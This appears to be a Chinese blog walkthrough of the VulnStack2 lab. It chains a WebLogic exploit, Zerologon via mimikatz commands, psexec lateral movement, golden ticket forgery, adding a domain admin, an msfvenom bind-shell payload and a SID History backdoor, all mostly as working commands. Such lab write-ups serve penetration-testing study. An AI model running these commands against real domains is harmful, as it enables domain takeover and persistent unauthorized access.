VulnStack2-主机不出网-黄金票据-SID History

2024-08-22 22:52

本文主要是介绍VulnStack2-主机不出网-黄金票据-SID History,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

网络结构

kali192.168.20.145
DC10.10.10.10
PC192.168.20.201/10.10.10.201
WEB192.168.20.80/10.10.10.80

WEB登录时,切到V1.3快照

且不登录默认用户

image-20240821175743026

开启weblogic服务

image-20240821194545822

漏洞利用

访问Weblogic默认的console路由http://192.168.20.80:7001/console

image-20240821194943684

直接用工具打一下

image-20240821195428858

拿到shell之后就可以在CS上线了

image-20240821202252633

操作会被web服务器上的360拦截可以手动关一下。。

内网渗透

可以看到是有个de1ay.com的域的,我们最终要拿到域管的权限

image-20240821202727862

zerologon一键秒域控

可以在CS中用mimikatz

lsadump::zerologon /target:dc.de1ay.com /account:dc$     #Poc
lsadump::zerologon /target:dc.de1ay.com /account:dc$ /exploit  #Exploit
lsadump::dcsync /domain:de1ay.com /dc:DC /user:administrator /authuser:dc$ /authdomain:de1ay /authpassword:"" /authntlm #获取域管administrator的hash
lsadump::postzerologon /target:dc.de1ay.com /account:dc$ #通过域管cmd,恢复域控机器账户密码

其中dc可以通过猜测,ping一下dc

image-20240821203851237

也可以shell net time

image-20240821212913431

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$漏洞存在

image-20240821204028015

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$ /exploit利用漏洞将域控机器账户密码置为空

image-20240821204349540

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC /user:administrator /authuser:dc$ /authdomain:de1ay /authpassword:"" /authntlm登录到域控机器账户并且获取域管密码的hash值

image-20240821204729686

最后是恢复域控机器账户密码,我们现在的权限会报ERROR,所以先放一下。

先ps_exec拿域控,通过之前的ping我们可以知道域控的IP 10.10.10.10

直接横向会报错,需要管理员权限

image-20240821205321857

所以现在先把WEB这台机器提升权限,用插件提权

image-20240821210006930

之后进行横向

image-20240821210057899

域控机器成功上线

image-20240821210121079

之后通过mimikatz抓明文可以看到,这台机器DC$被我们置空的密码

image-20240821211302198

现在就可以恢复域控机器账户的密码了 lsadump::postzerologon /target:dc.de1ay.com /account:dc$

可以看到这个脚本是把密码改为Waza1234

image-20240821211525917

之后看下域中主机shell net group "domain computers" /domain

image-20240821212008832

通过ping pc拿到它的IP(net view不能用),拿到IP 10.10.10.201

image-20240821212127846

之后ps_exec拿PC的权限,成功上线

image-20240821212323184

权限维持

黄金票据

黄金票据能我们在拥有普通域用户权限和KRBTGT账号(负责加密和签名 Kerberos 票据的账户)的哈希的情况下,获取域管理员权限。我们上面已经得到域控的 system权限了,可以使用黄金票据做权限维持,当失去域控system权限后,再通过域内其他任意主机伪造黄金票据来重新获取system权限。

1.从AS得到票据授权票据(TGT)(krbtgt hash加密) 每个会话进行一次

2.以TGT为凭证,通过TGS服务器的认证,获得服务授权票据SGT 对每个不同的服务请求一次

3.客户/服务器交换信息以获得服务 每次服务时

黄金票据就是通过获得的krbtgt Hash自己伪造一个TGT票据,这样就不需要通过AS认证而可以自己伪造任何一个域用户。

下面看我们需要获取的信息

首先域控的System通过hashdump获取KRBTGT的哈希

image-20240821220504178

通过明文的抓取也可以拿到域的SID(去掉后面部分)

image-20240821221041567

之后就可以伪造黄金票据了,我们选择PC这台10.10.10.201

image-20240822152400066

伪造成功

之后远程访问下域控DC的C盘目录shell dir \\dc\c$

image-20240822152330963

看下kerberos票证

image-20240822152526019

之后可以添加域管账户

shell net user pass 1234qwer! /add /domain
shell net group "domain admins" pass /add /domain
shell net group "domain admins" /domain

image-20240822152858972

SID History

在Windows中,每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。
如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz,可以将SID History属性添加到域中任意用户的SID History属性中。在实战中,如果获得了域管理员权限,则可以将SID History作为实现持久化的方法。

下面演示用mimikatz添加SID History后门的操作

首先在域控机器上创建一个普通用户shell net user yezzz 1234qwer! /add /domain

image-20240822163356745

之后联动msf使用msf的mimikatz

msf上线不出网主机

这里有遇见个问题,因为域控不出网,不能直接弹shell到msf。所以先上线WEB服务器,并添加路由

run autoroute -s 10.10.10.0/24

这样我们就能通过WEB的session去访问10.10.10.10

image-20240822182605138

之后我们生成msf的payload,注意LHOST是0.0.0.0或者127.0.0.1(因为要进行正向连接,需要10.10.10.10开启4444端口的监听)

用CS将payload上传到10.10.10.10主机

msfvenom -p windows/x64/meterpreter/bind_tcp Lhost=0.0.0.0 Lport=4444 -f exe -a x64 > 44444.exe

之后用handler模块捕获4444的连接

image-20240822201050399

在10.10.10.10运行exe

image-20240822201136469

成功在msf上线

image-20240822201159738

SID History后门
# 查看用户的 SID History 属性
Get-ADUser yezzz -Properties sidhistory
Get-ADUser Administrator -Properties sidhistory

查看我们创建的用户yezzz和域管的SID

image-20240822202756572

之后用shellcode_inject模块启动mimikatz

用的是Donut执行mimikatz,参考

minikatz免杀之msf加载bin文件 - G0mini - 博客园 (cnblogs.com)

Mimikatz的18种免杀姿势及防御策略(上) (qq.com)

Releases · gentilkiwi/mimikatz (github.com)

TheWover/donut: Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters (github.com)

前面我用成x86的payload了,在这儿报错,修改过程就不写了

use use post/windows/manage/shellcode_inject
set session 5
set shellcode /home/kali/mimi64.bin
set ChANNELIZED true 
set InTERACTIVE true 

image-20240822212227731

下面通过mimikatz修改SID

# 将高权限的 SID History 属性注入
privilege::debug
# 注入SID之前需要使用以下命令修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性;
# mimikatz在2.1版本后,将 misc:addsid 模块添加到了 sid:add 模块下。
sid::patch
sid::add /sam:yezzz /new:administrator# 清除恶意用户的 SID History 属性
sid::clear /sam:yezzz

image-20240822213106296

最后用powershell看下修改后的恶意用户yezzz的SID

image-20240822213356065

可以看到,yezzz用户的SID History和administrator域管理员的SID相同。yezzz用户便拥有了administrator域管理员的权限。

参考文章:

vulnstack2靶机笔记-CSDN博客

网络安全/域渗透]内网安全入门靶场 vulnstack1攻略_哔哩哔哩_bilibili

权限维持之黄金白银票据 | Gta1ta’s Blog (myblog.ac.cn)

权限维持之:SID History 域控权限维持 - f_carey - 博客园 (cnblogs.com)

这篇关于VulnStack2-主机不出网-黄金票据-SID History的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1097631

相关文章

浅谈主机加固,六种有效的主机加固方法

在数字化时代,数据的价值不言而喻,但随之而来的安全威胁也日益严峻。从勒索病毒到内部泄露,企业的数据安全面临着前所未有的挑战。为了应对这些挑战,一种全新的主机加固解决方案应运而生。 MCK主机加固解决方案,采用先进的安全容器中间件技术,构建起一套内核级的纵深立体防护体系。这一体系突破了传统安全防护的局限,即使在管理员权限被恶意利用的情况下,也能确保服务器的安全稳定运行。 普适主机加固措施:

实例:如何统计当前主机的连接状态和连接数

统计当前主机的连接状态和连接数 在 Linux 中,可使用 ss 命令来查看主机的网络连接状态。以下是统计当前主机连接状态和连接主机数量的具体操作。 1. 统计当前主机的连接状态 使用 ss 命令结合 grep、cut、sort 和 uniq 命令来统计当前主机的 TCP 连接状态。 ss -nta | grep -v '^State' | cut -d " " -f 1 | sort |

【虚拟化】AIO主机安装PVE8,配置网络,安装win11(virtio,qcow2,scsi,oobe,adk)

【虚拟化】AIO主机安装PVE8,配置网络,安装win11(virtio,qcow2,scsi,oobe,adk) 文章目录 1、ESXI vs PVE,AIO主机系统二选一2、PVE网络配置(DNS,换源,网卡,https,概览)3、win11虚拟化配置(virtio,raw,qcow2)附,域名解析,rocky9.4,黑群晖 1、ESXI vs PVE,AIO主机系统二选

jdbc连接数据库使用sid和service_name的区别 ?

问题描述: ORA-12505, TNS:listener does not currently know of SID given in connect descriptor The Connection descriptor used by the client was: 10.12.162.84:1521:xxxx  oracle数据的tnsnames.ora中配置的是:SERVICE

虚拟机ubuntu与主机共享文件夹

现在主机(windows)上新建一个共享文件夹 打开虚拟机 按下面操作打开共享文件夹   进入虚拟机的系统    cd /mnt/hgfs 如果报错 可以按下面的解决   挂载一下  sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other 如果显示不存在这个文件夹  我们可以去自己创建一个 cd /mnt

history命令内容格式优化:添加日期时间及IP地址

目录 一、历史记录格式1.1操作步骤1.2其他说明 二、历史记录问题2.1记录显示不全2.2定时自动记录 一、历史记录格式 1.1操作步骤 [可选步骤]清空当前历史记录:history -c && > ~/.bash_history && history -r 编辑对应的配置文件: 用户配置文件:vim ~/.bashrc系统配置文件[推荐]:sudo vim /etc

H3C SR-MPLS通过OSPF通告SID配置

首先在配置前理解几个基本概念 Prefix SID配置 统一分配和配置(全局规划)loopback和prefix sidPrefix SID=SRGB Base(16000)+index Adj SID自动生成 对应SR节点间的互联链路SR节点本地标识,从设备本地Segment池中动态分配设备会为其IGP中的链路自动分配Adj SID,并通过IGP进行广播 IGP SID的分发与传递

Vue 项目hash和history模式打包部署与服务器配置

你好,我是沐爸,欢迎点赞、收藏、评论和关注。 在开发 Vue 项目时,Vue Router 提供了两种模式来创建单页面应用(SPA)的 URL:hash 模式和 history 模式。 简单说下两者的主要区别: hash 模式下的 URL 看起来不那么美观,带有一个 # 符号。在这种模式下,URL 中的 hash 值(# 后面的部分)会改变,但页面不会重新加载。因为不会向服务器发送请求,服

数据清洗:信息时代的黄金前奏

数据清洗:信息时代的黄金前奏 在当今这个数据驱动的时代,信息已成为社会发展的重要资源。企业、政府乃至个人,都依赖于数据分析来指导决策、优化流程、预测趋势。然而,在数据从产生到应用的整个链条中,一个至关重要的环节往往被忽视或低估,那就是数据清洗(Data Cleaning)。数据清洗,作为数据预处理的核心步骤,其重要性不言而喻,它是确保数据质量、提升数据分析准确性与效率的关键所在。 一、数据清洗

Linux Ubuntu 能PING IP但不能PING主机域名的解决方法

------------------------------------------------------------------------------- ------------------------------------------------------------------------------- vi /etc/nsswitch.conf hosts: file